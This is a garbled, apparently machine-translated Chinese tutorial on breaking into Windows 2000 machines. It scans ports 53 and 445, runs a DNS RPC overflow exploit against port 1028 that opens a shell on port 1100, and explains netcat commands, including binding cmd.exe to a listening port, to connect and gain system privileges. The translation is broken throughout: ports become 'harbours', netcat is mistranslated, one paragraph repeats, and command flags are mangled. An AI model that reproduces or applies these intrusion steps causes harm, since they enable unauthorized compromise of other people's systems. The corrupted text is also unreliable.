审查:前提是打开53和445个端口。

1、选择superscan扫描,选择端口列表中的53和445端口,然后选择扫描主机段。


2、选择主机53和445端口,并输入DNS的IP在CMD T为一个特定的漏洞扫描端口的主机上,1028:Vulnerability


1028个港口溢出来了。






前提是53和445个端口必须是开放的。

1、选择superscan扫描,选择端口列表中的53和445端口,然后选择扫描主机段。


2、选择主机53和445端口,并输入DNS的IP在CMD T为一个特定的漏洞扫描端口的主机上,1028:Vulnerability


1028端口有一个溢出漏洞,操作系统:窗口2000系统类型窗口2000。


3、溢出在DNS - T 2000all IP 1028执行目标主机,连接到目标主机的TCP端口建立成功地连接到主机的TCP端口,


成功绑定到vulnerale dcerpc接口已经连接到对方的RPC端口,操作系统指纹结果:Windows 2000


系统指纹识别是wind2000系统,攻击发送,检查端口1100的攻击代码已经成功发送,并尝试连接1100端口。当最后一句出现


及时的声明意味着我们将成功。


4,如何连接1100个端口的另一个,当然我们要使用NC。


5、数控的全称叫netcat 以下是它的一些常用功能


1、nc.exe - VV·L·P 6069,这意味着听在本地6069端口,VV:显示详细的信息。L:显示器和听入境信息。P:显示器


端口号。


2。正如我们遇到的,对方已经打开了一个港口,他在等我们接通。连接上会有什么当然,系统权限是shell。


nc.exe - VV 127.0.0.1 5257,连接IP为127.0.0.1的5257端口。


3,您也可以在本地监视器端口同时绑定shell,这相当于telnet服务器。


这是shell.nc.exe·L·P 5257 T E cmd.exe,听力和绑定cmd.exe在5257端口本机,E功能程序取向。T是telnet形式


回答。


4、可以手动向主机提交数据包(通常是80)的港口,nc.exe - VV 127.0.0.1 80<yan.txt,并提交yan.txt到127.0.0.1的80端口。


内容。


6,介绍了常用的四种nc.exe。现在知道如何使用NC连接另一方的1100个端口。我们使用数控VV 127.0.0.1 1100连接到对方的1100端口。


一个系统的权限管理为成功获得,现在你想做什么。